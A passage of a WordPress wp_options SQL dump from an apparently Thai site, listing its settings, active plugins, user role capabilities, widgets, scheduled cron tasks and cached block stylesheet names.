(13,'rss_use_excerpt','0','yes'),
(14,'mailserver_url','mail.example.com','yes'),
(15,'mailserver_login','login@example.com','yes'),
(16,'mailserver_pass','password','yes'),
(17,'mailserver_port','110','yes'),
(18,'default_category','1','yes'),
(19,'default_comment_status','','yes'),
(20,'default_ping_status','','yes'),
(21,'default_pingback_flag','','yes'),
(22,'posts_per_page','12','yes'),
(23,'date_format','j F Y','yes'),
(24,'time_format','G:i น.','yes'),
(25,'links_updated_date_format','j F Y G:i น.','yes'),
(26,'comment_moderation','','yes'),
(27,'moderation_notify','','yes'),
(28,'permalink_structure','','yes'),
(29,'rewrite_rules','','yes'),
(30,'hack_file','0','yes'),
(31,'blog_charset','UTF-8','yes'),
(32,'moderation_keys','','no'),
(33,'active_plugins','a:18:{i:0;s:19:\"akismet/akismet.php\";i:1;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:2;s:59:\"content-views-query-and-display-post-page/content-views.php\";i:3;s:23:\"elementor/elementor.php\";i:4;s:25:\"embedpress/embedpress.php\";i:5;s:25:\"forminator/forminator.php\";i:6;s:49:\"gallery-block-lightbox/gallery-block-lightbox.php\";i:7;s:25:\"generateblocks/plugin.php\";i:8;s:33:\"kadence-blocks/kadence-blocks.php\";i:9;s:55:\"nextend-smart-slider3-pro/nextend-smart-slider3-pro.php\";i:10;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:11;s:31:\"popup-builder/popup-builder.php\";i:12;s:41:\"post-views-counter/post-views-counter.php\";i:13;s:35:\"question-answer/question-answer.php\";i:14;s:41:\"seed-buddhist-year/seed-buddhist-year.php\";i:15;s:25:\"seed-fonts/seed-fonts.php\";i:16;s:27:\"seed-social/seed-social.php\";i:17;s:20:\"team-members/tmm.php\";}','yes'),
(34,'category_base','','yes'),
(35,'ping_sites','https://rpc.pingomatic.com/','yes'),
(36,'comment_max_links','2','yes'),
(37,'gmt_offset','7','yes'),
(38,'default_email_category','1','yes'),
(39,'recently_edited','','no'),
(40,'template','plant','yes'),
(41,'stylesheet','plant','yes'),
(42,'comment_registration','','yes'),
(43,'html_type','text/html','yes'),
(44,'use_trackback','0','yes'),
(45,'default_role','subscriber','yes'),
(46,'db_version','60421','yes'),
(47,'uploads_use_yearmonth_folders','1','yes'),
(48,'upload_path','','yes'),
(49,'blog_public','1','yes'),
(50,'default_link_category','2','yes'),
(51,'show_on_front','page','yes'),
(52,'tag_base','','yes'),
(53,'show_avatars','1','yes'),
(54,'avatar_rating','G','yes'),
(55,'upload_url_path','','yes'),
(56,'thumbnail_size_w','150','yes'),
(57,'thumbnail_size_h','150','yes'),
(58,'thumbnail_crop','1','yes'),
(59,'medium_size_w','300','yes'),
(60,'medium_size_h','300','yes'),
(61,'avatar_default','mystery','yes'),
(62,'large_size_w','1024','yes'),
(63,'large_size_h','1024','yes'),
(64,'image_default_link_type','none','yes'),
(65,'image_default_size','','yes'),
(66,'image_default_align','','yes'),
(67,'close_comments_for_old_posts','','yes'),
(68,'close_comments_days_old','14','yes'),
(69,'thread_comments','','yes'),
(70,'thread_comments_depth','5','yes'),
(71,'page_comments','','yes'),
(72,'comments_per_page','50','yes'),
(73,'default_comments_page','newest','yes'),
(74,'comment_order','asc','yes'),
(75,'sticky_posts','a:0:{}','yes'),
(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','auto'),
(79,'uninstall_plugins','a:3:{s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:37:\"optinmonster/optin-monster-wp-api.php\";s:32:\"optin_monster_api_uninstall_hook\";s:27:\"popup-maker/popup-maker.php\";a:2:{i:0;s:11:\"PUM_Install\";i:1;s:16:\"uninstall_plugin\";}}','no'),
(80,'timezone_string','','yes'),
(81,'page_for_posts','0','yes'),
(82,'page_on_front','14','yes'),
(83,'default_post_format','0','yes'),
(84,'link_manager_enabled','0','yes'),
(85,'finished_splitting_shared_terms','1','yes'),
(86,'site_icon','11','on'),
(87,'medium_large_size_w','768','yes'),
(88,'medium_large_size_h','0','yes'),
(89,'wp_page_for_privacy_policy','3','yes'),
(90,'show_comments_cookies_opt_in','','yes'),
(91,'admin_email_lifespan','1762763985','yes'),
(92,'disallowed_keys','','no'),
(93,'comment_previously_approved','','yes'),
(94,'auto_plugin_theme_update_emails','a:0:{}','no'),
(95,'auto_update_core_dev','enabled','yes'),
(96,'auto_update_core_minor','enabled','yes'),
(97,'auto_update_core_major','enabled','yes'),
(98,'wp_force_deactivated_plugins','a:0:{}','off'),
(99,'wp_attachment_pages_enabled','0','yes'),
(100,'initial_db_version','57155','yes'),
(101,'wp_user_roles','a:6:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:81:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:11:\"smartslider\";b:1;s:18:\"smartslider_config\";b:1;s:16:\"smartslider_edit\";b:1;s:18:\"smartslider_delete\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:17:\"manage_forminator\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:10:\"qa_manager\";a:2:{s:4:\"name\";s:10:\"QA Manager\";s:12:\"capabilities\";a:7:{s:4:\"read\";b:1;s:15:\"create_question\";b:1;s:22:\"create_others_question\";b:1;s:15:\"delete_question\";b:1;s:12:\"upload_files\";b:1;s:20:\"edit_others_question\";b:1;s:22:\"delete_others_question\";b:1;}}}','yes'),
(102,'fresh_site','0','off'),
(103,'WPLANG','th','yes'),
(104,'user_count','1','no'),
(105,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:178:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>เรื่องล่าสุด</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:254:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>ความเห็นล่าสุด</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:162:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>คลังเก็บ</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:164:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>หมวดหมู่</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),
(106,'sidebars_widgets','a:15:{s:19:\"wp_inactive_widgets\";a:0:{}s:8:\"rightbar\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:7:\"leftbar\";a:0:{}s:7:\"shopbar\";a:0:{}s:11:\"home_banner\";a:0:{}s:6:\"search\";a:0:{}s:6:\"action\";a:0:{}s:10:\"mobile_nav\";a:0:{}s:13:\"footer_blocks\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:18:\"smartslider_area_1\";a:0:{}s:13:\"array_version\";i:3;}','yes'),
(107,'cron','a:16:{i:1758701620;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1758702503;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1758724103;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1758724123;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1758767303;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758767323;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758767326;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758775756;a:1:{s:20:\"sgpbGetNotifications\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758778315;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758780855;a:1:{s:32:\"embedpress_daily_milestone_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758782949;a:1:{s:31:\"embedpress_cache_cleanup_action\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758784540;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1758940176;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1759026503;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1761283847;a:1:{s:27:\"delete_block_library_folder\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}s:7:\"version\";i:2;}','on'),
(108,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(109,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(110,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(111,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(112,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(113,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(114,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(115,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(116,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(117,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(118,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(119,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(120,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(121,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(122,'_transient_wp_core_block_css_files','a:2:{s:7:\"version\";s:5:\"6.6.1\";s:5:\"files\";a:496:{i:0;s:23:\"archives/editor-rtl.css\";i:1;s:27:\"archives/editor-rtl.min.css\";i:2;s:19:\"archives/editor.css\";i:3;s:23:\"archives/editor.min.css\";i:4;s:22:\"archives/style-rtl.css\";i:5;s:26:\"archives/style-rtl.min.css\";i:6;s:18:\"archives/style.css\";i:7;s:22:\"archives/style.min.css\";i:8;s:20:\"audio/editor-rtl.css\";i:9;s:24:\"audio/editor-rtl.min.css\";i:10;s:16:\"audio/editor.css\";i:11;s:20:\"audio/editor.min.css\";i:12;s:19:\"audio/style-rtl.css\";i:13;s:23:\"audio/style-rtl.min.css\";i:14;s:15:\"audio/style.css\";i:15;s:19:\"audio/style.min.css\";i:16;s:19:\"audio/theme-rtl.css\";i:17;s:23:\"audio/theme-rtl.min.css\";i:18;s:15:\"audio/theme.css\";i:19;s:19:\"audio/theme.min.css\";i:20;s:21:\"avatar/editor-rtl.css\";i:21;s:25:\"avatar/editor-rtl.min.css\";i:22;s:17:\"avatar/editor.css\";i:23;s:21:\"avatar/editor.min.css\";i:24;s:20:\"avatar/style-rtl.css\";i:25;s:24:\"avatar/style-rtl.min.css\";i:26;s:16:\"avatar/style.css\";i:27;s:20:\"avatar/style.min.css\";i:28;s:21:\"button/editor-rtl.css\";i:29;s:25:\"button/editor-rtl.min.css\";i:30;s:17:\"button/editor.css\";i:31;s:21:\"button/editor.min.css\";i:32;s:20:\"button/style-rtl.css\";i:33;s:24:\"button/style-rtl.min.css\";i:34;s:16:\"button/style.css\";i:35;s:20:\"button/style.min.css\";i:36;s:22:\"buttons/editor-rtl.css\";i:37;s:26:\"buttons/editor-rtl.min.css\";i:38;s:18:\"buttons/editor.css\";i:39;s:22:\"buttons/editor.min.css\";i:40;s:21:\"buttons/style-rtl.css\";i:41;s:25:\"buttons/style-rtl.min.css\";i:42;s:17:\"buttons/style.css\";i:43;s:21:\"buttons/style.min.css\";i:44;s:22:\"calendar/style-rtl.css\";i:45;s:26:\"calendar/style-rtl.min.css\";i:46;s:18:\"calendar/style.css\";i:47;s:22:\"calendar/style.min.css\";i:48;s:25:\"categories/editor-rtl.css\";i:49;s:29:\"categories/editor-rtl.min.css\";i:50;s:21:\"categories/editor.css\";i:51;s:25:\"categories/editor.min.css\";i:52;s:24:\"categories/style-rtl.css\";i:53;s:28:\"categories/style-rtl.min.css\";i:54;s:20:\"categories/style.css\";i:55;s:24:\"categories/style.min.css\";i:56;s:19:\"code/editor-rtl.css\";i:57;s:23:\"code/editor-rtl.min.css\";i:58;s:15:\"code/editor.css\";i:59;s:19:\"code/editor.min.css\";i:60;s:18:\"code/style-rtl.css\";i:61;s:22:\"code/style-rtl.min.css\";i:62;s:14:\"code/style.css\";i:63;s:18:\"code/style.min.css\";i:64;s:18:\"code/theme-rtl.css\";i:65;s:22:\"code/theme-rtl.min.css\";i:66;s:14:\"code/theme.css\";i:67;s:18:\"code/theme.min.css\";i:68;s:22:\"columns/editor-rtl.css\";i:69;s:26:\"columns/editor-rtl.min.css\";i:70;s:18:\"columns/editor.css\";i:71;s:22:\"columns/editor.min.css\";i:72;s:21:\"columns/style-rtl.css\";i:73;s:25:\"columns/style-rtl.min.css\";i:74;s:17:\"columns/style.css\";i:75;s:21:\"columns/style.min.css\";i:76;s:29:\"comment-content/style-rtl.css\";i:77;s:33:\"comment-content/style-rtl.min.css\";i:78;s:25:\"comment-content/style.css\";i:79;s:29:\"comment-content/style.min.css\";i:80;s:30:\"comment-template/style-rtl.css\";i:81;s:34:\"comment-template/style-rtl.min.css\";i:82;s:26:\"comment-template/style.css\";i:83;s:30:\"comment-template/style.min.css\";i:84;s:42:\"comments-pagination-numbers/editor-rtl.css\";i:85;s:46:\"comments-pagination-numbers/editor-rtl.min.css\";i:86;s:38:\"comments-pagination-numbers/editor.css\";i:87;s:42:\"comments-pagination-numbers/editor.min.css\";i:88;s:34:\"comments-pagination/editor-rtl.css\";i:89;s:38:\"comments-pagination/editor-rtl.min.css\";i:90;s:30:\"comments-pagination/editor.css\";i:91;s:34:\"comments-pagination/editor.min.css\";i:92;s:33:\"comments-pagination/style-rtl.css\";i:93;s:37:\"comments-pagination/style-rtl.min.css\";i:94;s:29:\"comments-pagination/style.css\";i:95;s:33:\"comments-pagination/style.min.css\";i:96;s:29:\"comments-title/editor-rtl.css\";i:97;s:33:\"comments-title/editor-rtl.min.css\";i:98;s:25:\"comments-title/editor.css\";i:99;s:29:\"comments-title/editor.min.css\";i:100;s:23:\"comments/editor-rtl.css\";i:101;s:27:\"comments/editor-rtl.min.css\";i:102;s:19:\"comments/editor.css\";i:103;s:23:\"comments/editor.min.css\";i:104;s:22:\"comments/style-rtl.css\";i:105;s:26:\"comments/style-rtl.min.css\";i:106;s:18:\"comments/style.css\";i:107;s:22:\"comments/style.min.css\";i:108;s:20:\"cover/editor-rtl.css\";i:109;s:24:\"cover/editor-rtl.min.css\";i:110;s:16:\"cover/editor.css\";i:111;s:20:\"cover/editor.min.css\";i:112;s:19:\"cover/style-rtl.css\";i:113;s:23:\"cover/style-rtl.min.css\";i:114;s:15:\"cover/style.css\";i:115;s:19:\"cover/style.min.css\";i:116;s:22:\"details/editor-rtl.css\";i:117;s:26:\"details/editor-rtl.min.css\";i:118;s:18:\"details/editor.css\";i:119;s:22:\"details/editor.min.css\";i:120;s:21:\"details/style-rtl.css\";i:121;s:25:\"details/style-rtl.min.css\";i:122;s:17:\"details/style.css\";i:123;s:21:\"details/style.min.css\";i:124;s:20:\"embed/editor-rtl.css\";i:125;s:24:\"embed/editor-rtl.min.css\";i:126;s:16:\"embed/editor.css\";i:127;s:20:\"embed/editor.min.css\";i:128;s:19:\"embed/style-rtl.css\";i:129;s:23:\"embed/style-rtl.min.css\";i:130;s:15:\"embed/style.css\";i:131;s:19:\"embed/style.min.css\";i:132;s:19:\"embed/theme-rtl.css\";i:133;s:23:\"embed/theme-rtl.min.css\";i:134;s:15:\"embed/theme.css\";i:135;s:19:\"embed/theme.min.css\";i:136;s:19:\"file/editor-rtl.css\";i:137;s:23:\"file/editor-rtl.min.css\";i:138;s:15:\"file/editor.css\";i:139;s:19:\"file/editor.min.css\";i:140;s:18:\"file/style-rtl.css\";i:141;s:22:\"file/style-rtl.min.css\";i:142;s:14:\"file/style.css\";i:143;s:18:\"file/style.min.css\";i:144;s:23:\"footnotes/style-rtl.css\";i:145;s:27:\"footnotes/style-rtl.min.css\";i:146;s:19:\"footnotes/style.css\";i:147;s:23:\"footnotes/style.min.css\";i:148;s:23:\"freeform/editor-rtl.css\";i:149;s:27:\"freeform/editor-rtl.min.css\";i:150;s:19:\"freeform/editor.css\";i:151;s:23:\"freeform/editor.min.css\";i:152;s:22:\"gallery/editor-rtl.css\";i:153;s:26:\"gallery/editor-rtl.min.css\";i:154;s:18:\"gallery/editor.css\";i:155;s:22:\"gallery/editor.min.css\";i:156;s:21:\"gallery/style-rtl.css\";i:157;s:25:\"gallery/style-rtl.min.css\";i:158;s:17:\"gallery/style.css\";i:159;s:21:\"gallery/style.min.css\";i:160;s:21:\"gallery/theme-rtl.css\";i:161;s:25:\"gallery/theme-rtl.min.css\";i:162;s:17:\"gallery/theme.css\";i:163;s:21:\"gallery/theme.min.css\";i:164;s:20:\"group/editor-rtl.css\";i:165;s:24:\"group/editor-rtl.min.css\";i:166;s:16:\"group/editor.css\";i:167;s:20:\"group/editor.min.css\";i:168;s:19:\"group/style-rtl.css\";i:169;s:23:\"group/style-rtl.min.css\";i:170;s:15:\"group/style.css\";i:171;s:19:\"group/style.min.css\";i:172;s:19:\"group/theme-rtl.css\";i:173;s:23:\"group/theme-rtl.min.css\";i:174;s:15:\"group/theme.css\";i:175;s:19:\"group/theme.min.css\";i:176;s:21:\"heading/style-rtl.css\";i:177;s:25:\"heading/style-rtl.min.css\";i:178;s:17:\"heading/style.css\";i:179;s:21:\"heading/style.min.css\";i:180;s:19:\"html/editor-rtl.css\";i:181;s:23:\"html/editor-rtl.min.css\";i:182;s:15:\"html/editor.css\";i:183;s:19:\"html/editor.min.css\";i:184;s:20:\"image/editor-rtl.css\";i:185;s:24:\"image/editor-rtl.min.css\";i:186;s:16:\"image/editor.css\";i:187;s:20:\"image/editor.min.css\";i:188;s:19:\"image/style-rtl.css\";i:189;s:23:\"image/style-rtl.min.css\";i:190;s:15:\"image/style.css\";i:191;s:19:\"image/style.min.css\";i:192;s:19:\"image/theme-rtl.css\";i:193;s:23:\"image/theme-rtl.min.css\";i:194;s:15:\"image/theme.css\";i:195;s:19:\"image/theme.min.css\";i:196;s:29:\"latest-comments/style-rtl.css\";i:197;s:33:\"latest-comments/style-rtl.min.css\";i:198;s:25:\"latest-comments/style.css\";i:199;s:29:\"latest-comments/style.min.css\";i:200;s:27:\"latest-posts/editor-rtl.css\";i:201;s:31:\"latest-posts/editor-rtl.min.css\";i:202;s:23:\"latest-posts/editor.css\";i:203;s:27:\"latest-posts/editor.min.css\";i:204;s:26:\"latest-posts/style-rtl.css\";i:205;s:30:\"latest-posts/style-rtl.min.css\";i:206;s:22:\"latest-posts/style.css\";i:207;s:26:\"latest-posts/style.min.css\";i:208;s:18:\"list/style-rtl.css\";i:209;s:22:\"list/style-rtl.min.css\";i:210;s:14:\"list/style.css\";i:211;s:18:\"list/style.min.css\";i:212;s:25:\"media-text/editor-rtl.css\";i:213;s:29:\"media-text/editor-rtl.min.css\";i:214;s:21:\"media-text/editor.css\";i:215;s:25:\"media-text/editor.min.css\";i:216;s:24:\"media-text/style-rtl.css\";i:217;s:28:\"media-text/style-rtl.min.css\";i:218;s:20:\"media-text/style.css\";i:219;s:24:\"media-text/style.min.css\";i:220;s:19:\"more/editor-rtl.css\";i:221;s:23:\"more/editor-rtl.min.css\";i:222;s:15:\"more/editor.css\";i:223;s:19:\"more/editor.min.css\";i:224;s:30:\"navigation-link/editor-rtl.css\";i:225;s:34:\"navigation-link/editor-rtl.min.css\";i:226;s:26:\"navigation-link/editor.css\";i:227;s:30:\"navigation-link/editor.min.css\";i:228;s:29:\"navigation-link/style-rtl.css\";i:229;s:33:\"navigation-link/style-rtl.min.css\";i:230;s:25:\"navigation-link/style.css\";i:231;s:29:\"navigation-link/style.min.css\";i:232;s:33:\"navigation-submenu/editor-rtl.css\";i:233;s:37:\"navigation-submenu/editor-rtl.min.css\";i:234;s:29:\"navigation-submenu/editor.css\";i:235;s:33:\"navigation-submenu/editor.min.css\";i:236;s:25:\"navigation/editor-rtl.css\";i:237;s:29:\"navigation/editor-rtl.min.css\";i:238;s:21:\"navigation/editor.css\";i:239;s:25:\"navigation/editor.min.css\";i:240;s:24:\"navigation/style-rtl.css\";i:241;s:28:\"navigation/style-rtl.min.css\";i:242;s:20:\"navigation/style.css\";i:243;s:24:\"navigation/style.min.css\";i:244;s:23:\"nextpage/editor-rtl.css\";i:245;s:27:\"nextpage/editor-rtl.min.css\";i:246;s:19:\"nextpage/editor.css\";i:247;s:23:\"nextpage/editor.min.css\";i:248;s:24:\"page-list/editor-rtl.css\";i:249;s:28:\"page-list/editor-rtl.min.css\";i:250;s:20:\"page-list/editor.css\";i:251;s:24:\"page-list/editor.min.css\";i:252;s:23:\"page-list/style-rtl.css\";i:253;s:27:\"page-list/style-rtl.min.css\";i:254;s:19:\"page-list/style.css\";i:255;s:23:\"page-list/style.min.css\";i:256;s:24:\"paragraph/editor-rtl.css\";i:257;s:28:\"paragraph/editor-rtl.min.css\";i:258;s:20:\"paragraph/editor.css\";i:259;s:24:\"paragraph/editor.min.css\";i:260;s:23:\"paragraph/style-rtl.css\";i:261;s:27:\"paragraph/style-rtl.min.css\";i:262;s:19:\"paragraph/style.css\";i:263;s:23:\"paragraph/style.min.css\";i:264;s:25:\"post-author/style-rtl.css\";i:265;s:29:\"post-author/style-rtl.min.css\";i:266;s:21:\"post-author/styl